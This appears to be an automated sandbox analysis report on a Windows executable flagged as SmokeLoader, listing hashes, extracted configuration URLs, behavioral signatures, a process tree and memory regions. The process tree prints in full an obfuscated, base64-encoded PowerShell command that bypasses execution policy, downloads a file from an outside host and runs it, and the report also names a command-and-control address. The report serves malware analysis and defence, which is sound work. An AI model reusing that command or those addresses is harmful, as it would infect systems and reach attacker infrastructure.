Analysis
-
max time kernel
23s -
max time network
135s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-04-2021 07:53
Static task
static1
Behavioral task
behavioral1
Sample
9fbd32c6bb25f6a660696fa9830c5040.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
9fbd32c6bb25f6a660696fa9830c5040.exe
Resource
win10v20210408
General
-
Target
9fbd32c6bb25f6a660696fa9830c5040.exe
-
Size
847KB
-
MD5
9fbd32c6bb25f6a660696fa9830c5040
-
SHA1
1e41347d36792e823a8982b10170d83a0722e3cc
-
SHA256
5de2819f832f06f69009b07779eacabc1b171540b10689b4b23eaac8f3232e14
-
SHA512
3b89b40676449390bfdc139aad1ac664cf14213eeed32dfa8e06671a8bcc97fe6facd42331657bdc220a9e38fee2021b1ea7a1c2ace6b89ec5d31d488eb2bdfb
Malware Config
Extracted
https://u.teknik.io/28oLW.jpg
Extracted
smokeloader
2018
http://94.140.115.43/1/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 14 2020 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
eVDwACBtpW.exepid process 3300 eVDwACBtpW.exe -
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
eVDwACBtpW.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum eVDwACBtpW.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 eVDwACBtpW.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4064 powershell.exe 4064 powershell.exe 4064 powershell.exe 2020 powershell.exe 2020 powershell.exe 2020 powershell.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
eVDwACBtpW.exepid process 3300 eVDwACBtpW.exe 3300 eVDwACBtpW.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4064 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe -
Suspicious use of FindShellTrayWindow 23 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepid process 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe -
Suspicious use of SendNotifyMessage 23 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepid process 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe 708 9fbd32c6bb25f6a660696fa9830c5040.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
9fbd32c6bb25f6a660696fa9830c5040.exepowershell.exepowershell.exedescription pid process target process PID 708 wrote to memory of 4064 708 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 708 wrote to memory of 4064 708 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 708 wrote to memory of 4064 708 9fbd32c6bb25f6a660696fa9830c5040.exe powershell.exe PID 4064 wrote to memory of 2020 4064 powershell.exe powershell.exe PID 4064 wrote to memory of 2020 4064 powershell.exe powershell.exe PID 4064 wrote to memory of 2020 4064 powershell.exe powershell.exe PID 2020 wrote to memory of 3300 2020 powershell.exe eVDwACBtpW.exe PID 2020 wrote to memory of 3300 2020 powershell.exe eVDwACBtpW.exe PID 2020 wrote to memory of 3300 2020 powershell.exe eVDwACBtpW.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"C:\Users\Admin\AppData\Local\Temp\9fbd32c6bb25f6a660696fa9830c5040.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AMgA4AG8ATABXAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAZQBWAEQAdwBBAEMAQgB0AHAAVwAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABlAFYARAB3AEEAQwBCAHQAcABXAC4AZQB4AGUAHSA=3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exe"4⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logMD5
b751492c41c6f3173d3b6f31c1b9b4eb
SHA1abc53a2c939b1d774940deb0b888b7b1ba5a3c7b
SHA256ad95fdf313324ed94997cec026239ea3631bf27298500e5def5941db9493b457
SHA512afa65279455b98353c6fe6869f2b545231231a953afbb1bf2eaed6b11646c4b4c77c5c18102651ae247a2f0fa18c698d908f4d23ca91581cbf28e32e061cb2e2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
3e03c7b392a4224a4d9f108bc2c024a9
SHA10b0fdcf73bc4d55eafb2de7ceba044ae22b64aae
SHA256a76c4fc3f225de3674870f375c709443bfc0580d80425d2347be509449ce73fe
SHA512a70ab6f08257ef162c654c767fb0f189b2c5e51e2623b66163fe57082c856c3bd3d4c5778e22489151fa4ff8c57294a8ac5b6e94d10a49f83d25e6ba216827bf
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
C:\Users\Admin\AppData\Local\Temp\eVDwACBtpW.exeMD5
0d1334075336455a13a36fd909417556
SHA14f1937f0eeeb697ef992547701295134fde65c20
SHA25633d7fa2a8936cc5064b63592b77f87c02fcdc1396395ae2316e3a7c783523ad9
SHA512d1f51355db6c4b040196b2588b8f21ef94d11901c7e8ea2c3632622adc791721d044c9a9448c8344406e5cbad2083f140caf9492d3dfef12724d22bb6e549971
-
memory/2020-146-0x0000000009570000-0x0000000009571000-memory.dmpFilesize
4KB
-
memory/2020-155-0x000000000A0F0000-0x000000000A0F1000-memory.dmpFilesize
4KB
-
memory/2020-154-0x00000000069D0000-0x00000000069D1000-memory.dmpFilesize
4KB
-
memory/2020-153-0x0000000009140000-0x0000000009141000-memory.dmpFilesize
4KB
-
memory/2020-148-0x0000000006983000-0x0000000006984000-memory.dmpFilesize
4KB
-
memory/2020-147-0x0000000008AF0000-0x0000000008AF1000-memory.dmpFilesize
4KB
-
memory/2020-128-0x0000000000000000-mapping.dmp
-
memory/2020-139-0x0000000006980000-0x0000000006981000-memory.dmpFilesize
4KB
-
memory/2020-140-0x0000000006982000-0x0000000006983000-memory.dmpFilesize
4KB
-
memory/3032-168-0x0000000002DE0000-0x0000000002DF5000-memory.dmpFilesize
84KB
-
memory/3032-167-0x0000000000E80000-0x0000000000E81000-memory.dmpFilesize
4KB
-
memory/3300-160-0x0000000000000000-mapping.dmp
-
memory/4064-127-0x0000000007FD0000-0x0000000007FD1000-memory.dmpFilesize
4KB
-
memory/4064-126-0x0000000007B50000-0x0000000007B51000-memory.dmpFilesize
4KB
-
memory/4064-125-0x0000000007B20000-0x0000000007B21000-memory.dmpFilesize
4KB
-
memory/4064-124-0x00000000077D0000-0x00000000077D1000-memory.dmpFilesize
4KB
-
memory/4064-123-0x0000000007760000-0x0000000007761000-memory.dmpFilesize
4KB
-
memory/4064-114-0x0000000000000000-mapping.dmp
-
memory/4064-122-0x0000000006EB0000-0x0000000006EB1000-memory.dmpFilesize
4KB
-
memory/4064-121-0x0000000006F60000-0x0000000006F61000-memory.dmpFilesize
4KB
-
memory/4064-120-0x0000000004472000-0x0000000004473000-memory.dmpFilesize
4KB
-
memory/4064-119-0x0000000006FC0000-0x0000000006FC1000-memory.dmpFilesize
4KB
-
memory/4064-169-0x0000000004473000-0x0000000004474000-memory.dmpFilesize
4KB
-
memory/4064-118-0x0000000004400000-0x0000000004401000-memory.dmpFilesize
4KB
-
memory/4064-117-0x0000000004470000-0x0000000004471000-memory.dmpFilesize
4KB
-
memory/4064-170-0x0000000004474000-0x0000000004476000-memory.dmpFilesize
8KB